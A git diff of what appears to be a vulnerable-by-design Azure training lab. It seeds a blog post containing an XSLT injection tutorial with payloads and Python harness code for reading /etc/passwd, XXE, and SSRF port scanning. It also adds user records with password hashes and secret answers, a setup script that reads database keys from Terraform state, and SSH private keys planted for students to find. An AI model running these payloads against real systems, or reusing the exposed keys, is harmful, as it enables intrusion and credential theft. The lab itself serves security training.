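# Apply the recon stylesheet to a dummy document and print the result;
# libxslt reports itself as an XSLT 1.0 processor.
print(transform(etree.XML('<root/>')))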

RCE

An XSLT file that invokes PHP functions can result in RCE if the application is vulnerable, i.e. if registerPHPFunctions is enabled.


Local File Read

And not only that, you could even read the contents of a local file (at least 1 line) via the reported error messages:


XSLT file containing the payload to read /etc/passwd file

Processing the XSLT file results in leaking the first line of the /etc/passwd file

Notice that the application gave out an error, but the first line was still revealed! This happens because document() (or even the include & import functions, for that matter) tries to parse the specified file; since the passwd file is not valid XML, these functions error out and show the first line of the file.

Now you might think that this is quite limiting, but wait a minute… If the application was running as root, you could get the root user’s password hash by reading the first line of the shadow file. And you can even read the contents of the .htpasswd file to get the password hash for admin or other users.

So it isn’t all in vain.
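
The same lxml harness can demonstrate the file-read primitive. This is just a sketch; whether the leaked line actually reaches the attacker depends on how the application surfaces processor errors:

from lxml import etree

LFI_XSL = b'''<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
                xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <xsl:copy-of select="document('/etc/passwd')"/>
  </xsl:template>
</xsl:stylesheet>'''

transform = etree.XSLT(etree.XML(LFI_XSL))
try:
    transform(etree.XML('<root/>'))
except etree.XSLTError:
    pass  # /etc/passwd is not valid XML, so document() errors out
# The parser errors reference the offending line; an app that echoes
# them back to the user leaks the file's first line.
for entry in transform.error_log:
    print(entry.message)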

XXE

You could even perform XXE but that should be obvious. Consider this example:


<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM \"path/to/file\">]>\n<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">\n  <xsl:template match=\"/events\">\n    Events &ext_file;:\n    <xsl:for-each select=\"event\">\n      <xsl:value-of select=\"name\"/>: <xsl:value-of select=\"value\"/>\n    </xsl:for-each>\n  </xsl:template>\n\n</xsl:stylesheet>\n

SSRF & Port Scanning

Using a payload like this one (I’ve omitted the extra stuff for brevity):


<xsl:copy-of select=\"document('http://10.10.10.10:22')\"/>\n

You can see that this would make a request to the specified IP. Now you can imagine that with this primitive, you get the power to perform SSRF and even port scans by leveraging the different error messages you get back in different scenarios (port open, closed, invalid host, etc.).
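
Swapping the file path for a URL turns the earlier sketch into the SSRF/port-scan oracle (the IP and port below are placeholders):

from lxml import etree

SSRF_XSL = b'''<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
                xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <xsl:copy-of select="document('http://127.0.0.1:22')"/>
  </xsl:template>
</xsl:stylesheet>'''

transform = etree.XSLT(etree.XML(SSRF_XSL))
try:
    transform(etree.XML('<root/>'))
except etree.XSLTError:
    pass
# The error text differs for open vs. closed ports and valid vs.
# invalid hosts; those differences are the scanning oracle.
for entry in transform.error_log:
    print(entry.message)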

Extra Resources

I’ve gone through only a few of the attacks that can be performed, but there’s more! For that, I recommend going through the following resources, which go much more in-depth:


  1. Abusing XSLT For Practical Attacks
  2. XSLT Injection
  3. XSLT Server Side Injection Attacks
  4. XSLT Security and Server Side Request Forgery
  5. The hidden dangers of XSLTProcessor — Remote XSL injection
  6. XSLT Injection Basics — Saxon
  7. An unexpected journey: From XSLT injection to a shell

Closing Thoughts

I hope you enjoyed this post and learnt something interesting. I wanted to cover XSLT injections at a high level and show the different attacks possible. There’s a lot more to learn, and the resources I have linked should give you a much deeper understanding. Overall, there’s nothing much to this vulnerability other than untrusted user input being passed to the processor; the nuances are specific to different processors and different languages.


If you’re confident with XSLT and related attacks, I encourage you to test yourself and earn our API security badge (sign in here, then head to our API Security badge challenge, subscribers only). In particular, this lab focuses on XSLT attacks. No hints in these challenges; you’re on your own now!

I’ll see you in the next post. Until then, happy learning!


", + "postingDate": "2022-05-12T00:00:00.000Z", + "postTitle": "XSLT Injections for Dummies", + "postStatus": "approved" + } +] \ No newline at end of file diff --git a/modules/module-1/resources/cosmosdb/blog-users.json b/modules/module-1/resources/cosmosdb/blog-users.json new file mode 100644 index 0000000..80ae406 --- /dev/null +++ b/modules/module-1/resources/cosmosdb/blog-users.json @@ -0,0 +1,107 @@ +[ + { + "email": "johndoe@gmail.com", + "address": "John Doe apartment, John Doe Street, Pune", + "authLevel": "0", + "country": "India", + "id": "1", + "name": "John Doe", + "password": "$2a$10$gNsZfdsyRtSRRDg9oLnAUeb.bkmfrhbotddzMKf6W0pS2oItkVYxO", + "phone": "1234567890", + "secretAnswer": "Cricket", + "secretQuestion": "What is your favourite sport?", + "username": "johndoe", + "userStatus": "active", + "creationDate": "2022-01-25T00:00:00.000Z" + }, + { + "email": "interdum.curabit@aol.com", + "address": "Ap #434-4703 Erat St.", + "authLevel": "200", + "country": "Mexico", + "id": "2", + "name": "Caryn Barr", + "password": "$2a$10$aUxnhrJEfoB1GDfqx8YF/uDgmbTJ/eJuzmnWgLeXjKV.maPOC4k2G", + "phone": "0712376412", + "secretAnswer": "8", + "secretQuestion": "At what age did you first interacted with a computer?", + "username": "carynbarr", + "userStatus": "active", + "creationDate": "2022-04-04T00:00:00.000Z" + }, + { + "email": "tempor@icloud.net", + "address": "5823 Velit St.", + "authLevel": "200", + "country": "South Africa", + "id": "3", + "name": "Prescott Hensley", + "password": "$2a$10$na.4xDXxaFiX0J0PDje20eGo3pHzHNElP.PiTF6wrctkTv9vmmYZG", + "phone": "0848627138", + "secretAnswer": "Lamp", + "secretQuestion": "What is your favourite colour?", + "username": "prescotthensley", + "userStatus": "active", + "creationDate": "2022-03-08T00:00:00.000Z" + }, + { + "email": "tempus.risus@aol.net", + "address": "P.O. Box 959, 723 Lobortis St.", + "authLevel": "100", + "country": "India", + "id": "4", + "name": "Dimitry Levy", + "password": "$2a$10$CSXpoeXZDCxXLrhWh.zmD.cM9UgNAoc0fADmUCgEe0lGH4FyXP6be", + "phone": "0227915835", + "secretAnswer": "Tiger", + "secretQuestion": "What is your first pet's name?", + "username": "dimitrylevy", + "userStatus": "active", + "creationDate": "2022-04-12T00:00:00.000Z" + }, + { + "email": "orci.adipiscing@google.com", + "address": "964-8243 Ipsum St.", + "authLevel": "300", + "country": "Netherlands", + "id": "5", + "name": "Quinn Baird", + "password": "$2a$10$6W4Vejfi55j0N3.7M1hXaemU9d4VTzh4cyks.ae9p5Ygiq77q4Ai2", + "phone": "0617783305", + "secretAnswer": "Huabii", + "secretQuestion": "Where is your hometown?", + "username": "quinnbaird", + "userStatus": "banned", + "creationDate": "2022-02-06T00:00:00.000Z" + }, + { + "email": "interdum.curabitur@aol.com", + "address": "Ap #434-4703 Erat St.", + "authLevel": "200", + "country": "Mexico", + "id": "6", + "name": "Raja Bauer", + "password": "$2a$10$DqZ2OS0AVflfWsK6W5YR2eKro8Eq5gQKFYAvO2h52S0umsWEYTvYu", + "phone": "0712376712", + "secretAnswer": "7", + "secretQuestion": "At what age did you first interacted with a computer?", + "username": "rajabauer", + "userStatus": "active", + "creationDate": "2022-05-12T00:00:00.000Z" + }, + { + "email": "phasellus@aol.ca", + "address": "Ap #497-8828 Dolor. 
Street", + "authLevel": "100", + "country": "New Zealand", + "id": "7", + "name": "Connor Cantrell", + "password": "$2a$10$5mB1SoNKWMVgFJCQXMfjB.0dWWOwujv5HFNOI6cDNyXq0p4R2k2WG", + "phone": "0788887134", + "secretAnswer": "Cricket", + "secretQuestion": "What is your favourite sport?", + "username": "conorcantrell", + "userStatus": "active", + "creationDate": "2022-04-12T00:00:00.000Z" + } +] \ No newline at end of file diff --git a/modules/module-1/resources/cosmosdb/create-table.py b/modules/module-1/resources/cosmosdb/create-table.py new file mode 100644 index 0000000..66be582 --- /dev/null +++ b/modules/module-1/resources/cosmosdb/create-table.py @@ -0,0 +1,69 @@ + +import json +from optparse import Values +import time +from urllib.parse import urljoin +import uuid +from azure.cosmos import CosmosClient, PartitionKey + + + + +# Initialize the Cosmos client +host = "" +key = "" + +with open('terraform.tfstate', 'r') as j: + contents = json.loads(j.read()) + print("reading file") + for j in contents['resources']: + for item in j : + if item == 'type' : + print(j['type']) + if j['type'] == 'azurerm_cosmosdb_account': + for k in j['instances']: + print(j['instances'][0]['attributes']['primary_key']) + key = j['instances'][0]['attributes']['primary_key'] + host = j['instances'][0]['attributes']['endpoint'] + +# +url = str(host) +primarykey = str(key) +print(url) +print(primarykey) +client = CosmosClient(url, primarykey) +# + +# Create a database +# +database_name = 'ine-cosmos-sql-db' +database = client.create_database_if_not_exists(id=database_name) +# + +# Create a container +# Using a good partition key improves the performance of database operations. +# +container_name = 'blog-users' +container = database.create_container_if_not_exists( + id=container_name, + partition_key=PartitionKey(path="/id") +) + + +db_file_json_1 = open('./modules/module-1/resources/cosmosdb/blog-users.json') +db_file_1 = json.loads(db_file_json_1.read()) +for db_item_1 in db_file_1: + container.upsert_item(body=db_item_1) + +container_name = 'blog-posts' +container = database.create_container_if_not_exists( + id=container_name, + partition_key=PartitionKey(path="/id") +) + +db_file_json_2 = open('./modules/module-1/resources/cosmosdb/blog-posts.json') +db_file_2 = json.loads(db_file_json_2.read()) +for db_item_2 in db_file_2: + container.upsert_item(body=db_item_2) + +print("Items Updated") diff --git a/modules/module-1/resources/storage_account/images/20220525172652548627.png b/modules/module-1/resources/storage_account/images/20220525172652548627.png new file mode 100644 index 0000000..8d93ac0 Binary files /dev/null and b/modules/module-1/resources/storage_account/images/20220525172652548627.png differ diff --git a/modules/module-1/resources/storage_account/images/20220525172652568597.png b/modules/module-1/resources/storage_account/images/20220525172652568597.png new file mode 100644 index 0000000..77d7297 Binary files /dev/null and b/modules/module-1/resources/storage_account/images/20220525172652568597.png differ diff --git a/modules/module-1/resources/storage_account/images/20220525173052304808.png b/modules/module-1/resources/storage_account/images/20220525173052304808.png new file mode 100644 index 0000000..a93085e Binary files /dev/null and b/modules/module-1/resources/storage_account/images/20220525173052304808.png differ diff --git a/modules/module-1/resources/storage_account/images/20220525173155599484.png b/modules/module-1/resources/storage_account/images/20220525173155599484.png new file mode 
100644 index 0000000..3eaf23e Binary files /dev/null and b/modules/module-1/resources/storage_account/images/20220525173155599484.png differ diff --git a/modules/module-1/resources/storage_account/images/20220525173359279634.png b/modules/module-1/resources/storage_account/images/20220525173359279634.png new file mode 100644 index 0000000..c2eaa40 Binary files /dev/null and b/modules/module-1/resources/storage_account/images/20220525173359279634.png differ diff --git a/modules/module-1/resources/storage_account/images/20220525173435646544.png b/modules/module-1/resources/storage_account/images/20220525173435646544.png new file mode 100644 index 0000000..b64d121 Binary files /dev/null and b/modules/module-1/resources/storage_account/images/20220525173435646544.png differ diff --git a/modules/module-1/resources/storage_account/images/20220525174934318996.png b/modules/module-1/resources/storage_account/images/20220525174934318996.png new file mode 100644 index 0000000..14a966a Binary files /dev/null and b/modules/module-1/resources/storage_account/images/20220525174934318996.png differ diff --git a/modules/module-1/resources/storage_account/images/20220525175114306915.png b/modules/module-1/resources/storage_account/images/20220525175114306915.png new file mode 100644 index 0000000..2aa944f Binary files /dev/null and b/modules/module-1/resources/storage_account/images/20220525175114306915.png differ diff --git a/modules/module-1/resources/storage_account/images/20220525175420931108.png b/modules/module-1/resources/storage_account/images/20220525175420931108.png new file mode 100644 index 0000000..b62e254 Binary files /dev/null and b/modules/module-1/resources/storage_account/images/20220525175420931108.png differ diff --git a/modules/module-1/resources/storage_account/images/20220525175644356721.png b/modules/module-1/resources/storage_account/images/20220525175644356721.png new file mode 100644 index 0000000..23fccd6 Binary files /dev/null and b/modules/module-1/resources/storage_account/images/20220525175644356721.png differ diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/config.txt b/modules/module-1/resources/storage_account/shared/files/.ssh/config.txt new file mode 100644 index 0000000..47851c7 --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/config.txt @@ -0,0 +1,47 @@ +Host VM_IP_ADDR + HostName justin + Port 22 + IdentityFile /shared/files/.ssh/keys/justin.pem + User justin + +Host 10.25.14.6 + HostName alice + Port 22 + IdentityFile /shared/files/.ssh/keys/alice.pem + User alice + +Host 34.207.133.229 + HostName bob + Port 22 + IdentityFile /shared/files/.ssh/keys/bob.pem + User bob + +Host 10.25.14.106 + HostName charles + Port 22 + IdentityFile /shared/files/.ssh/keys/charles.pem + User charles + +Host 172.16.84.59 + HostName john + Port 22 + IdentityFile /shared/files/.ssh/keys/john.pem + User john + +Host 172.16.87.25 + HostName mary + Port 22 + IdentityFile /shared/files/.ssh/keys/mary.pem + User mary + +Host 172.22.26.8 + HostName mike + Port 22 + IdentityFile /shared/files/.ssh/keys/mike.pem + User mike + +Host 10.0.48.71 + HostName sophia + Port 22 + IdentityFile /shared/files/.ssh/keys/sophia.pem + User sophia \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/alice.pem b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/alice.pem new file mode 100644 index 0000000..c0d965f --- /dev/null +++ 
b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/alice.pem @@ -0,0 +1,39 @@ +-----BEGIN RSA PRIVATE KEY----- +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 +-----END RSA PRIVATE KEY----- diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/alice.pub b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/alice.pub new file mode 100644 index 0000000..0cc41cb --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/alice.pub @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDFEK8LB3UbUDjfv85CiCAd+lMyf14lVjSLPUaSLhbNZimu9M80aKzt4h6BouAk4bLLgG5j38nVX6t8OAw+aLLnfG3gIJSdW66n1qZ2w7qhcQrLIy4haBbNoIZVCavktBrZ9r/WBMxKqW2JA6ni74B/drKH6ms5L4hyBfUdWuMUMWwtpuCe2ZGLFR71tFHf0ZbOwqSLVsQS5SDZGD9ZesEYTCLcxbgyV9ne/Ba+7bFkm/LHhUVXLU24KEre4t+LE9kSg/T1HdNPk7+UClCBP2kudmVF4pY7ak7hvA/KcoGoGGo2fFGvUr6pI9V8w0JRPIlHI5bExjw+5/DB24H1k+C6N3dFbJfTeeLg51cAq8asSwiFrLoNBknSAzUvbAFjK1UWAjYwSEi0Zm1ZLZi2DdeHAf0ScSY9vH/Ca9S+Met6CZmK5iWDfykuyYxTY1WnjvbAX+D9aScJpMIWP26wytlIcqcLzDoQsdeBJgZ6mtaHCmhg9FvczX2i0eRULgoFk2k= alice diff --git 
a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/bob.pem b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/bob.pem new file mode 100644 index 0000000..3287857 --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/bob.pem @@ -0,0 +1,39 @@ +-----BEGIN RSA PRIVATE KEY----- +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 +-----END RSA PRIVATE KEY----- diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/bob.pub b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/bob.pub new file mode 100644 index 0000000..faa4ec4 --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/bob.pub @@ -0,0 +1 @@ +ssh-rsa 
AAAAB3NzaC1yc2EAAAADAQABAAABgQCidX5buIyIFnzVZhTVLtCVIniKnam9LqZrgjhXxAj+dUiQzsGlZg15Z0SAFf8siGH1+HbyH4bC8XFCmKb9CMRwK2qZma7yXkKLIvPVYEfuwQJFful1durwQTHVdRqEoiT00ADIMlr0EgbQvsW13WUHDMhBzFFNtMSzTChSdr9lc7yriMc78mc5KSZXuS1N7Dr9wci7gFz/NkbZCftOx/cc9m/eq+RqsjbjwdLgB31pFQaN41yfm6v8TcvDqQXZv12STl6A4sfRxfC0BCEc8OdII576sBRfbRAxo4zCtIrsswj+5I7pENsx1j/T0je07o5MLdVJBspJlR95SxHONoZetXx5OrU9VC20jUGnbpHN7x9DBsMTW2lBZaFWDzW/6Hc1fhblupelOov2sNK5yGZh8cZfKMLKUB4E7k27CtZFfZLV2GwG5E3GAKTa5/vgTI+U0mX32zXF2hMC1eNfQafE8B9qYVyKH7cgPP/BskINyRO+BYnqUaHVz8t/AyeRlYE= bob diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/charles.pem b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/charles.pem new file mode 100644 index 0000000..33cf1b1 --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/charles.pem @@ -0,0 +1,39 @@ +-----BEGIN RSA PRIVATE KEY----- +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 